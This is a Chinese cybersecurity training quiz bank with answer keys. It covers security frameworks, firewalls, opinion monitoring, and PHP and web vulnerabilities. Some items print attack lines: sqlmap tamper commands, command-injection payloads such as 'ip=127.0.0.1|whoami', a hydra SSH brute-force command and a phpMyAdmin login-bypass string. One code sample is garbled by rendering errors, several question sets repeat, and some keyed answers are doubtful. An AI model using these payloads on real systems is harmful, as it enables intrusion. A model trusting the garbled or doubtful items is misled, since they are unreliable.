标准答案: B

30、SABSA模型内容不包括的层次是():

A、 审计、战略

B、 度量、实施

C、 渗透、防御

D、 概念

标准答案: C

31、SABSA模型纵横坐标定义错误的是():

A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层

B、 横坐标:什么,为什么,过程,谁,地点,时间

C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表

D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序

标准答案: C

32、SABSA模型不是基于安全架构开发的一个模型和方法论。()

A、 对

B、 错

标准答案: B

33、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()

A、 对

B、 错

标准答案: A

34、第一代防火墙技术是基于电路层流量

A、 对

B、 错

标准答案: B

35、数据通过防火墙传输是发生在哪层

A、 会话层

B、 传输层

C、 网络层

D、 链路层

标准答案: C

36、防火墙术语中Trust指的是

A、 源端口

B、 源IP

C、 NAT

D、 DMZ

标准答案: B

37、集成防火墙类似于UTM

A、 对

B、 错

标准答案: A

38、防火墙的简单包过滤工作相关说法正确的是

A、 防火墙会检查数据区是否有恶意数据

B、 防火墙会建立连接状态表用于保持连接

C、 前后报文无关联

D、 防火墙对应用层控制较强

标准答案: C

39、防火墙包过滤规则中,21端口用于FTP数据包的传输

A、 对

B、 错

标准答案: B

40、CPU指令类型包括进程和线程

A、 对

B、 错

标准答案: A

41、分层级设计的操作系统中,0层控制哪方面

A、 应用程序

B、 存储

C、 处理器

D、 进程

标准答案: C

42、微内核架构中,核心在微内核,其它在客户端服务器端

A、 对

B、 错

标准答案: B

43、系统安全架构中属于终端防护的是

A、 主机防火墙

B、 交换机管理

C、 补丁管理

D、 上网监控

标准答案: A

44、操作系统安全保护的核心是系统应用程序及数据库功能

A、 对

B、 错

标准答案: B

45、Linux系统中对文件的权限控制属于哪类信息安全模型

A、 非干扰模型

B、 Biba模型

C、 Clark-Wilson模型

D、 访问矩阵模型

标准答案: D

46、以下哪类模型采用了分层级的设计

A、 信息流模型

B、 中国墙模型

C、 Bell-LaPadula模型

D、 非干扰模型

标准答案: C

47、状态机模型描述了一种无论处于何种状态都是绝对安全的系统

A、 对

B、 错

标准答案: B

48、人在互联网中的角色呈现多样性这个说法正确吗

A、 对

B、 错

标准答案: A

49、视频中以下哪项不是舆情分析需要的知识储备?

A、 传播学

B、 统计学

C、 心理学

D、 人体力学

标准答案: D

50、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗

A、 对

B、 错

标准答案: B

1、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()

A、 对

B、 错

标准答案: A

2、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()

A、 对

B、 错

标准答案: A

3、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()

A、 对

B、 错

标准答案: A

4、TOGAF框架需求管理迭代步骤方法正确的是():

A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构

标准答案: A

5、Zachman企业框架方向和设计都是采用纵横坐标。()

A、 对

B、 错

标准答案: A

6、Zachman模型不是基于人来开发的一个模型框架。()

A、 对

B、 错

标准答案: B

7、SABSA模型内容不包括的层次是():

A、 审计、战略

B、 度量、实施

C、 渗透、防御

D、 概念

标准答案: C

8、SABSA模型纵横坐标定义错误的是():

A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层

B、 横坐标:什么,为什么,过程,谁,地点,时间

C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表

D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序

标准答案: C

9、SABSA模型不是基于安全架构开发的一个模型和方法论。()

A、 对

B、 错

标准答案: B

10、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()

A、 对

B、 错

标准答案: A

11、第一代防火墙技术是基于电路层流量

A、 对

B、 错

标准答案: B

12、数据通过防火墙传输是发生在哪层

A、 会话层

B、 传输层

C、 网络层

D、 链路层

标准答案: C

13、防火墙术语中Trust指的是

A、 源端口

B、 源IP

C、 NAT

D、 DMZ

标准答案: B

14、集成防火墙类似于UTM

A、 对

B、 错

标准答案: A

15、防火墙的简单包过滤工作相关说法正确的是

A、 防火墙会检查数据区是否有恶意数据

B、 防火墙会建立连接状态表用于保持连接

C、 前后报文无关联

D、 防火墙对应用层控制较强

标准答案: C

16、防火墙包过滤规则中,21端口用于FTP数据包的传输

A、 对

B、 错

标准答案: B

17、CPU指令类型包括进程和线程

A、 对

B、 错

标准答案: A

18、分层级设计的操作系统中,0层控制哪方面

A、 应用程序

B、 存储

C、 处理器

D、 进程

标准答案: C

19、微内核架构中,核心在微内核,其它在客户端服务器端

A、 对

B、 错

标准答案: B

20、系统安全架构中属于终端防护的是

A、 主机防火墙

B、 交换机管理

C、 补丁管理

D、 上网监控

标准答案: A

21、操作系统安全保护的核心是系统应用程序及数据库功能

A、 对

B、 错

标准答案: B

22、Linux系统中对文件的权限控制属于哪类信息安全模型

A、 非干扰模型

B、 Biba模型

C、 Clark-Wilson模型

D、 访问矩阵模型

标准答案: D

23、以下哪类模型采用了分层级的设计

A、 信息流模型

B、 中国墙模型

C、 Bell-LaPadula模型

D、 非干扰模型

标准答案: C

24、状态机模型描述了一种无论处于何种状态都是绝对安全的系统

A、 对

B、 错

标准答案: B

25、人在互联网中的角色呈现多样性这个说法正确吗

A、 对

B、 错

标准答案: A

26、视频中以下哪项不是舆情分析需要的知识储备?

A、 传播学

B、 统计学

C、 心理学

D、 人体力学

标准答案: D

27、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗

A、 对

B、 错

标准答案: B

28、企业和政府中的舆情分析体系包括信息监测这个环节吗?

A、 对

B、 错

标准答案: A

29、在进行舆情事件分析时首先考量的是所在组织的利害关系这个说法对吗

A、 对

B、 错

标准答案: A

30、在案例中相关企业应当快速回应避免对品牌造成伤害这个说法正确吗

A、 对

B、 错

标准答案: A

31、监测系统的作用在于海量信息的筛选这个说法正确吗?

A、 对

B、 错

标准答案: A

32、舆情分析工作中可以根据情况自己进行决策执行这个说法正确吗

A、 对

B、 错

标准答案: B

33、研究舆情事件中参与者的身份构成重要吗

A、 对

B、 错

标准答案: A

34、下面哪些步骤是舆情管理中不必要的?

A、 舆情分析

B、 组织协同

C、 事后总结

D、 事件处理

标准答案: C

35、组织在舆情事件出现后的协同要根据组织架构中各个部分的职责和职能进行协同这个说法正确吗

A、 对

B、 错

标准答案: A

36、单个维权和群体维权对于舆情工作的区别只是在于数量这个说法正确吗

A、 对

B、 错

标准答案: B

37、这次事件后国家食品药品监督管理总局针对社会关心的疫苗安全问题发布科普知识予以回应,这是一种舆情处理吗?

A、 对

B、 错

标准答案: A

38、课程中的组织设计的管理考核是指划定舆情工作任务量化目标这个说法正确吗?

A、 对

B、 错

标准答案: A

39、管理者除了对舆情部门的管理还必须包括对自身信息的管理这个说法正确吗

A、 对

B、 错

标准答案: A

40、领导能力只包括政策解读和决策对应两种能力这个说法正确吗?

A、 对

B、 错

标准答案: B

41、分析研判包括对信息产生的后果的预测这个说法正确吗

A、 对

B、 错

标准答案: A

42、舆情工作的技术环节重点在于信息的收集和过滤这个说法正确吗

A、 对

B、 错

标准答案: A

43、视频中从哪个角度分析网民对快播案件的态度?

A、 法律

B、 网民结构

C、 道德

D、 互联网发展

标准答案: B

44、视频中提出的分析报告中网民主要的年龄段是多少?

A、 0-5

B、 6-17

C、 18-25

D、 25-35

标准答案: C

45、网站登记备案归以下哪个部门管理?

A、 公安部

B、 网信办

C、 宣传部

D、 国安部

标准答案: B

46、监测系统的最终目标在于什么?

A、 关键字监测

B、 敏感词发现

C、 内容分析

D、 提高效率

标准答案: D

47、关键字监测和敏感词发现的目的在于过滤不相关信息这个说法正确吗

A、 对

B、 错

标准答案: A

48、棱镜计划是只收集美国公民手机的隐私数据这个说法正确吗

A、 对

B、 错

标准答案: B

49、监测系统用户管理中的审批功能是为了保障信息安全这个说法正确吗?

A、 对

B、 错

标准答案: A

50、监测系统的重点在于信息收集能力,而不在于信息关联能力这个说法正确吗?

A、 对

B、 错

标准答案: B

1、如何使用sqlmap自带的绕过脚本?

A、 sqlmap.py -u “http://xxx.com/index.php?id=1” –dbs

B、 sqlmap.py -u “http://xxx.com/index.php” –data “id=1” –dbs

C、 sqlmap.py -u “http://xxx.com/index.php?id=1” -v 3 –tamper “xxx.py” –dbs

D、 sqlmap.py -u “http://xxxx.com/index.php” –cookie “id=1” –level 2 –dbs

标准答案: C

2、下列哪项不是文件信息泄露的途径?

A、 网站目录备份

B、 默认的网站数据库文件

C、 网站提供的上传功能

D、 第三方源代码管理

标准答案: C

3、下列关于Windows权限的继承,说法不当的是?

A、 新建的子文件夹和文件会继承上一级目录的权限

B、 根目录下的文件夹或文件继承磁盘分区的权限

C、 下级目录可以拒绝继承上级权限

D、 默认子目录不继承上一级目录权限

标准答案: D

4、下列Backup Operators组权限中,说法错误的是?

A、 从网络访问此计算机

B、 调整进程的内存分配

C、 允许本地登录

D、 关闭系统

标准答案: B

5、下列哪个工具可以造成局域网网络瘫痪?

A、 namp

B、 sqlmap

C、 arpspoof

D、 zaproxy

标准答案: C

6、下列解决“Zip炸弹”的办法中有效的是?

A、 限制文件大小和类型

B、 限制文件内容

C、 限制文件名称

D、 限制文件路径

标准答案: A

7、下列关于JAVA序列化机制的说法错误的是?

A、 包含系统资源的直接句柄和相对地址空间信息的字段不被声明为transient,该对象在序列化状态下可能会被修改

B、 保护虚拟机外的字节流的另一方式是对序列化包产生的流进行加密

C、 字节流加密防止解码或读取被序列化的对象的私有状态

D、 对象流就是将对象的内容进行流化,不可以对流化后的对象进行读写操作

标准答案: D

8、下列关于浏览器刷新和转到的说法错误的是?

A、 刷新检查时会保留之前的一些变量的值

B、 刷新浏览器取网页的新内容来更新本机缓存

C、 转到是浏览器会使用已经存于本机中的缓存

D、 转到使用本机中的缓存文件,同时保留之前的变量

标准答案: D

9、FileReader.read方法返回值的取值范围是____。

A、 0-127

B、 1-128

C、 0-255

D、 0-65535

标准答案: D

10、下列选项在样式表中会被浏览器忽略的____。

A、 /

B、 *

C、 //

D、 /**/

标准答案: D

11、CSS属性可以是元素固有的属性但不可以是自定义的属性。

A、 正确

B、 错误

标准答案: B

12、下面关于web组件的描述不正确的是____。

A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架

B、 不同的web开发框架开发出的web应用功能也不同

C、 存储包括数据库存储、文件存储、内存存储

D、 目前最主流的web容器是Apache

标准答案: B

13、CSS属性可以是元素固有的属性但不可以是自定义的属性。

A、 正确

B、 错误

标准答案: B

14、下列代码<img/src=”ichunqiu.png”alt=“ichunqiu”> <img/’>能够被

A、 IE6

B、 IE7

C、 IE8

D、 IE9

标准答案: A

15、下列选项在样式表中会被浏览器忽略的是?

A、 /

B、 *

C、 //

D、 /**/

标准答案: D

16、下列选项是firebug中控制台命令行输入开头符号的是?

A、 :

B、 ~

C、 //

D、 >

标准答案: D

17、FileReader.read方法返回值的取值范围是?

A、 0-127

B、 1-128

C、 0-255

D、 0-65535

标准答案: D

18、InputStream.read返回值为____,作为读取流结束标志。

A、 true

B、 false

C、 -1

D、 1

标准答案: C

19、下面关于web组件的描述不正确的是____。

A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架

B、 不同的web开发框架开发出的web应用功能也不同

C、 存储包括数据库存储、文件存储、内存存储

D、 目前最主流的web容器是Apache

标准答案: B

20、下列在执行完exp后获取cmd的shell应该输入____命令。

A、 system

B、 cmd

C、 whoami

D、 shell

标准答案: D

21、下列中容易被xss窃取账号信息的是____。

A、 不轻易访问陌生链接

B、 使用无线网络应注意自己是否被劫持

C、 发现网站中存在xss告知网站客服

D、 直接打开并登录别人发的网址

标准答案: D

22、下列插件中,具有代理功能的是:

A、 Hackbar

B、 FoxyProxy

C、 ModifyHeaders

D、 ShowIP

标准答案: B

23、下列软件中,是源代码审计工具的是:

A、 PCHunter

B、 WebShellKill

C、 AZServerTool

D、 Seay审计工具

标准答案: D

24、php.ini 是___配置文件:

A、 全局

B、 当前文件夹

C、 指定文件夹

D、 指定文件

标准答案: A

25、在php配置文件,设置short_open_tag =On的意思是:

A、 启用全局变量

B、 关闭全局变量

C、 启用短标签

D、 关闭短标签

标准答案: C

26、开启php安全模式后,下列哪个代码无法正常执行:

A、 <?php echo “Hello World”; ?>

B、 <?php phpinfo()?>

C、 <?php system(‘whoami’)?;>

D、 <?phpinfo();?>

标准答案: C

27、在php.ini中设置allow_url_include=off后,网站程序能够包含远程文件

A、 对

B、 错

标准答案: B

28、下列php函数属于危险函数的是:

A、 echo

B、 eval

C、 levenshtein

D、 php_check_syntax

标准答案: B

29、下列函数中,不属于包含函数的是:

A、 require

B、 include

C、 include_once

D、 levenshtein

标准答案: D

30、重命名一个文件或目录的函数是:

A、 rmdir

B、 unlink

C、 rename

D、 fopen

标准答案: C

31、下列函数中不属于命令执行函数的是:

A、 exec()

B、 proc_open()

C、 system()

D、 echo()

标准答案: D

32、php.ini中的安全模式是默认开启

A、 对

B、 错

标准答案: B

33、安装好XDebug后,需要配置什么文件才能够使用:

A、 php.ini

B、 .htaccess

C、 httpd.conf

D、 nsswitch.conf

标准答案: A

34、我们可以使用XDebug来跟踪,调试和分析PHP程序

A、 对

B、 错

标准答案: A

35、php程序中针对于安装问题的审计属于特定功能定向法:

A、 对

B、 错

标准答案: A

36、登录密码爆破属于哪一类漏洞:

A、 XSS

B、 sql注入

C、 撞库

D、 CSRF

标准答案: C

37、通过删除phpsessid,达到绕过验证码的目的,该攻击手法名称为:

A、 绕过sessid爆破

B、 修改sessid爆破

C、 sessid不更新造成爆破

D、 根据sessid生成验证码造成爆破

标准答案: A

38、通过使用不易被识别的验证码,且不根据sessid生成验证码内容能够有效防止爆破攻击

A、 对

B、 错

标准答案: A

39、下列漏洞中,哪些不属于注入漏洞:

A、 命令执行

B、 XSS

C、 敏感信息泄漏

D、 sql注入

标准答案: C

40、下列函数中,哪个不能用来执行命令注入漏洞:

A、 system()

B、 exec()

C、 echo()

D、 passthru()

标准答案: C

41、使用正则表达式对输入的参数进行过滤,能够达到修补和防御命令注入漏洞

A、 对

B、 错

标准答案: A

42、本机文件包含漏洞不能够包含哪些文件:

A、 日志文件

B、 本地网站文件

C、 远程木马文件

D、 session文件

标准答案: C

43、当allow_url_include和allow_url_fopen都设置为off时,能够直接包含共享文件

A、 对

B、 错

标准答案: A

44、下列注入漏洞不属于sql注入的是:

A、 数字型注入

B、 字符型注入

C、 cookie注入

D、 跨站脚本注入

标准答案: D

45、下列功能点不能够造成sql注入的有:

A、 使用模糊查询

B、 waf替换关键字

C、 使用id进行查询

D、 网站html标签过滤不完善

标准答案: D

46、使用完善的waf脚本且对sql语句中的参数进行处理,能够修补和杜绝sql注入漏洞

A、 对

B、 错

标准答案: A

47、截断注入在什么情况下比较适用:

A、 无法闭合单引号进行注入时

B、 数据库语句为双条件

C、 当无法闭合单引号进行注入时且为数据库语句为双条件

D、 当无法闭合单引号进行注入时不为数据库语句为双条件

标准答案: C

48、下列选项对二次注入说法正确的是:

A、 当用户输入的恶意数据首次传送给数据库时,将会进行安全的处理,但当应用程序调用时将会以一种危险的方式运行

B、 当用户输入的恶意数据传送给数据库时,应用程序调用时将会以一种危险的方式运行

C、 如果无法注释sql语句则无法进行二次注入攻击

D、 无法闭合单引号是,无法进行二次注入攻击

标准答案: A

49、为所有数据库访问使用参数查询并参数化集成到查询中的每个数据项,可以有效的防御二次注入漏洞

A、 对

B、 错

标准答案: A

50、任意文件读取属于什么漏洞:

A、 文件操作漏洞

B、 数据库操作漏洞

C、 XSS漏洞

D、 文件包含漏洞

标准答案: A

1、下列哪个操作不能通过越权漏洞来实现:

A、 修改管理员密码

B、 修改其他人帐号密码

C、 删除网站代码

D、 查看其它人信息

标准答案: C

2、越权漏洞分为平行越权和垂直越权:

A、 对

B、 错

标准答案: A

3、下列对跨站脚本攻击(XSS)的描述正确的是:

A、 XSS 攻击指的是恶意攻击在 WEB 页面里插入恶意代码, 当用户浏览该页面时嵌入其中 WEB 页面的代码会被执行

B、 XSS 攻击是 DOOS 攻击的一种变种

C、 XSS 攻击就是 CC 攻击

D、 XSS 攻击就是利用被控制的机器不断地向被攻击网站发送访问请求

标准答案: A

4、下列选项中,对非持久型xss攻击说法正确的是:

A、 非持久型XSS攻击是一次性的

B、 非持久型XSS攻击可以持续攻击,具有持续性

C、 非持久型XSS攻击是将攻击语句插入到服务器端

D、 非持久型XSS攻击可以对所有访问该网页的用户进行攻击

标准答案: A

5、根据近几年的统计web应用漏洞影响率最高的漏洞是

A、 XSS

B、 SQL注入

C、 信息泄露

标准答案: A

6、128位安全套接层技术是指哪种

A、 SSH

B、 SSL

C、 SH

标准答案: B

7、再互联网早期没有动态内容都是静态内容

A、 对

B、 错

标准答案: A

8、劫持账号是属于何种权限提升

A、 水平权限提升

B、 垂直权限提升

C、 扩展权限提升

标准答案: B

9、IIS或APCHE这种http底层服务器软件是属于哪种分类

A、 web应用

B、 web平台

C、 web客户端

标准答案: B

10、web应用攻击包括资源和认证,会话攻击等

A、 对

B、 错

标准答案: A

11、HTTP首部字段中的Host指的是以下哪种

A、 请求资源所在服务器

B、 发送指令的主机

C、 使用者的主机地址

标准答案: A

12、临时重定向在HTTP状态码中的数字代号是

A、 301

B、 302

C、 503

标准答案: B

13、以下属于HTTP方法的是

A、 POST

B、 ACL

C、 Cookie

标准答案: A

14、get方式只能支持ASCII字符

A、 对

B、 错

标准答案: A

15、关于CSRF说法正确的是

A、 删掉referer字段可以用来防止CSRF攻击

B、 CSRF攻击只能利用GET方式去达到攻击的目的

C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击

D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站

标准答案: D

16、xss和csrf的漏洞原理是一样的

A、 对

B、 错

标准答案: B

17、利用CSRF漏洞进行测试,相关说法错误的是

A、 CSRF是利用管理员的操作在无声无息中进行

B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作

C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库

D、 默认设置情况下,找到备份数据库的网站路径即可下载网址的.sql文件

标准答案: B

18、CSRF可以在无声无息中进行管理员的操作

A、 对

B、 错

标准答案: A

19、关于验证码说法错误的是

A、 为了防止恶意破解密码,刷票,论坛灌水,刷页

B、 可以防止黑客对特定注册用户特定程序进行暴力破解登陆

C、 验证码通常使用一些线条和一些不规则的字符组成

D、 通过手机短信发送的4位数验证码是非常安全的

标准答案: D

20、保证验证码的新鲜度可以有效的防止大多数暴力破解攻击

A、 对

B、 错

标准答案: A

21、绕过验证码的方法不包括

A、 统默认不显示验证码,而是在用户校验错误一定次数之后再出现,在cookie中写入一个标记,比如loginErr = 1,后续错误累加。 攻击者不带Cookie提交请求即可绕过验证码功能。

B、 验证码在web服务器上对应一个session值,攻击者在cookie中带固定的sessionID和固定的一个验证码字符串,即可轻松爆破。

C、 程序把验证码的内容发送到客户端cookie、或输出到response headers的其他字段,攻击者可以轻松逆向破解得到原值。

D、 如果实施ip策略强制输入验证码,这样可以防止验证码的安全问题,没办法攻破

标准答案: D

22、安全的验证码使用规则最合适的是验证码只能用一次

A、 对

B、 错

标准答案: A

23、关于验证码识别并且暴力破解密码说法错误的是

A、 4位数的图像验证码是可以被工具直接识别的,安全性形同虚设

B、 爆破成功以后会提示302跳转登陆

C、 不管验证码是图片还是数字,只要随机不够,图片干扰不够还是有机会可以进行验证码的机器识别

D、 验证码可以解决90%以上的Web安全问题

标准答案: D

24、解决验证码识别问题是攻击者为了更好的进行暴力破解攻击

A、 对

B、 错

标准答案: A

25、php中哪些函数可以执行系统命令

A、 file_put_contents

B、 system

C、 print_r

D、 var_dump

标准答案: B

26、系统命令执行是指应用程序对传入命令行的参数过滤不严导致恶意用户能控制最终执行的命令

A、 对

B、 错

标准答案: A

27、通过php哪项配置可以禁止webshell执行系统命令

A、 disable_setting

B、 disable_shell

C、 disable_functions

D、 disable_config

标准答案: C

28、“可以执行系统命令

A、 对

B、 错

标准答案: A

29、对于下面代码,能成功执行命令的选项是 <?php if( isset( $_POST[ ‘Submit’ ] ) ) { t a r g e t = t r i m ( target = trim(target=trim(_REQUEST[ ‘ip’ ]); KaTeX parse error: Expected ‘EOF’, got ‘&’ at position 25: …ions = array( ‘&̲amp;’ =&gt; ”,…’ => ‘’, ‘(’ => ‘’, ‘)’ => ‘’, ‘`’ => ‘’, ); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); $cmd = shell_exec( ‘ping -c 4 ’ . KaTeX parse error: Expected ‘EOF’, got ‘&’ at position 8: target &̲#41;; print_r(cmd); } ?>

A、 ip=127.0.0.1|whoami

B、 ip=127.0.0.1&whoami

C、 ip=127.0.0.1||whoami

D、 ip=127.0.0.1&&whoami

标准答案: C

30、对于下面代码,能成功执行”whoami”的选项是 <?php $cmd=system(“ping -c 2 “.$_GET[‘ip’]); print_r($cmd); ?>

A、 ip=127.0.0.1|whoami

B、 ip=127.0.0.1&whoami

C、 ip=127.0.0.1||whoami

D、 ip=127.0.0.1&&whoami

标准答案: A

31、如果||的前面命令执行失败则执行 || 后面的命令

A、 对

B、 错

标准答案: A

32、关于MS15-034HTTP远程代码执行漏洞说法正确的是

A、 利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

B、 该漏洞对服务器系统造成了不小的影响,主要影响了Centos,redhat等LINUX的主流服务器操作系统。

C、 MS15-034HTTP远程代码执行漏洞的CVE编号为CVE-2015-1647

D、 Http.sys 为了在Windows平台上优化niginx服务器性能而引入的一个内核模式驱动程序。它为niginx及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。

标准答案: A

33、MS15-034可以进行本地提权

A、 对

B、 错

标准答案: B

34、关于Jboss反序列化漏洞说法有误的是

A、 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程

B、 Jboss反序列化漏洞是在反序列化时并没有限制实例化对象的类型,导致可以任意构造应用中已经包含的对象利用反序列化操作进行实例化。

C、 Java 在进行反序列化操作的时候会使用 ObjectInputStream 类调用 readObject() 方法去读取传递过来的序列化对象字节流进行处理

D、 Boss反序列化漏洞文件是JMXInvokerServlet

标准答案: D

35、解决Jboss远程方法调用漏洞把invoker删除再把1099关闭即可

A、 对

B、 错

标准答案: A

36、关于st2说法错误的是

A、 存在st2漏洞的网站可以执行命令

B、 存在st2漏洞的网站大多数是最高权限

C、 s2-016参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行

D、 st2漏洞会导致php网站被攻陷

标准答案: D

37、st2漏洞是没有正确过滤用户的输入输出导致的问题

A、 对

B、 错

标准答案: A

38、关于心脏出血漏洞说法错误的是

A、 Heartbleed漏洞产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查

B、 Heartbleed漏洞可以获得https传输的用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据

C、 Heartbleed漏洞是近几年来影响广泛,覆盖面广,危害很高的漏洞之一

D、 利用Heartbleed漏洞用户每次读取都能获得相关用户名密码

标准答案: D

39、关于CVE-2015-4024说法有误的是

A、 是PHP multipart/form-data 导致的远程DOS漏洞

B、 因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS

C、 在该漏洞中multipart_buffer_headers函数解析header对应value时,value值是不存在的

D、 升级PHP版本可以很好的抵御该漏洞的攻击

标准答案: C

40、DDOS攻击也有可能是代码本身导致的问题

A、 对

B、 错

标准答案: A

41、关于逻辑/越权漏洞说法有误的是

A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞

B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。

C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因

D、 密码找回漏洞是权限管理不足导致的问题

标准答案: D

42、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键

A、 对

B、 错

标准答案: A

43、关于密码找回说法有误的是

A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解

B、 有些密码找回凭证可从客户端直接获取

C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞

D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置

标准答案: C

44、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的

A、 对

B、 错

标准答案: A

45、关于越权漏洞说法有误的是

A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定

B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试

C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户

D、 4. 越权漏洞的本身对网站不会照成攻击伤害

标准答案: D

46、下列关于暴力破解说法错误的是

A、 1. 暴力猜解就是将密码进行逐个推算,直到找到正真的密码为止

B、 2. 暴力破解分为c/s架构的破解和b/s架构的破解

C、 3. 暴力破解的成功率取决于字典的准确性和覆盖性

D、 4. 只要有数据传输的地方就可以进行暴力破解

标准答案: D

47、 暴力破解即是一个无限穷举的过程

A、 对

B、 错

标准答案: A

48、关于hydra使用说法有误的是

A、 hydra在Linux和windows平台上都可以使用

B、 爆破ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns x.x.x.x ssh

C、 hydra可以支持大多数服务和协议

D、 hydra可以支持一个C段服务器的22端口爆破

标准答案: D

49、关于eWebEditor编辑器说法有误的是

A、 1. eWebEditor编辑器一般都是通过默认口令进入后台来拿shell

B、 2. 加入下载到ewebeditor.mdb可以通过某些工具来读取管理员密码

C、 3. eWebEditor后台修改自定义上传后缀即可拿shell

D、 4. 可以配合iis6等服务器的解析漏洞来获得网站的webshell

标准答案: D

50、关于FCKeditor 说法有误的是

A、 1. 默认查看编辑器版本通过FCKeditor/_whatsnew.html

B、 2. 默认编辑页FCKeditor/_samples/default.html 等等

C、 3. 在FCKeditor2.2到2.4.2的php版本中存在任意文件上传

D、 4. FCKeditor只有任意文件上传漏洞

标准答案: D

1、phpmyadmin某些低版本中存在的万能密码是

A、 localhost’@’@’

B、 localhost’@’@”

C、 localhost’@”@”

标准答案: B

2、通过扫描器很难扫描到逻辑漏洞,这种说法正确吗

A、 对

B、 错

标准答案: A

3、IIS 组件中不包括以下哪项服务?

A、 WEB 服务

B、 FTP 服务

C、 APACHE 服务

D、 SMTP 服务

标准答案: C

4、在网站属性的目录安全性中,不可以定义的是以下哪一项?

A、 身份验证和访问控制

B、 目录权限设置

C、 IP地址和域名限制

D、 安全通信

标准答案: B

5、IIS 安装后,默认可以使用ASP、ASP.NET等功能,是否正确?

A、 对

B、 错

标准答案: B

6、FTP 服务默认端口是?

A、 21

B、 80

C、 8080

D、 22

标准答案: A

7、以下哪个命令可往FTP服务器传输文件?

A、 GET

B、 INPUT

C、 PUT

D、 OPEN

标准答案: C

8、FTP 主要是用来实现客户端与服务器的文件传输,是否正确?

A、 对

B、 错

标准答案: A

9、使用以下哪个选项可以查看本机路由表?

A、 route add

B、 route print

C、 route delete

D、 route change

标准答案: B

10、以下不属于 “ 外部网络协议” 主要功能的是?

A、 用于外部邻站的获取

B、 用于邻站的可达性测试

C、 用于选路由信息更新

D、 用于本地系统内部使用的选路协议

标准答案: D

11、Windows Server 2003的 “路由和远程访问” 服务是一个全功能的软件路由器,是否正确?

A、 对

B、 错

标准答案: A

12、按照协议分类,以下不属于VPN类型的是?

A、 PPTP

B、 L2TP

C、 IPSec

D、 TCP

标准答案: D

13、Windows Server 2003中,远程访问策略,默认有几个?

A、 1

B、 2

C、 3

D、 4

标准答案: B

14、某公司员工出差到外地,他想访问企业内网的服务器资源,这时候我们可以通过VPN技术来实现,是否正确?

A、 对

B、 错

标准答案: A

15、以下哪个命令可以查看Linux系统是否安装了BIND程序包?

A、 rpm -q bind

B、 rpm -i bind

C、 rpm -v bind

D、 rpm -h bind

标准答案: A

16、以下哪个选项可以重启DNS服务?

A、 service named stop

B、 service named start

C、 /etc/rc.d/init.d/named stop

D、 service named restart

标准答案: D

17、在主配置文件中添加所规划的正向区域和反向区域,以“zone”为关键字设定区域,指向区域文件所在位置和文件名,是否正确?

A、 对

B、 错

标准答案: A

18、在 wireshark筛选器中,可以捕获出所有 ip 为 192.168.1.1 的是?

A、 ip.src == 192.168.1.1

B、 ip.dst == 192.168.1.1

C、 ip.addr == 192.168.1.1

D、 !(ip.src == 192.168.1.1)

标准答案: C

19、对于筛选器中输入 ip.addr == 192.168.1.1 and tcp.port == 8080描述正确的是?

A、 筛选出目的IP地址为 192.168.1.1 并且端口为 8080 的数据包

B、 筛选出目的IP地址为 192.168.1.1 或者端口为 8080 的数据包

C、 筛选出所有IP地址为 192.168.1.1 并且端口为 8080 的数据包

D、 筛选出所有IP地址为 192.168.1.1 或者端口为 8080 的数据包

标准答案: C

20、在 wireshark筛选器中,输入 http 可以捕获 http 协议的数据包,是否正确?

A、 对

B、 错

标准答案: A

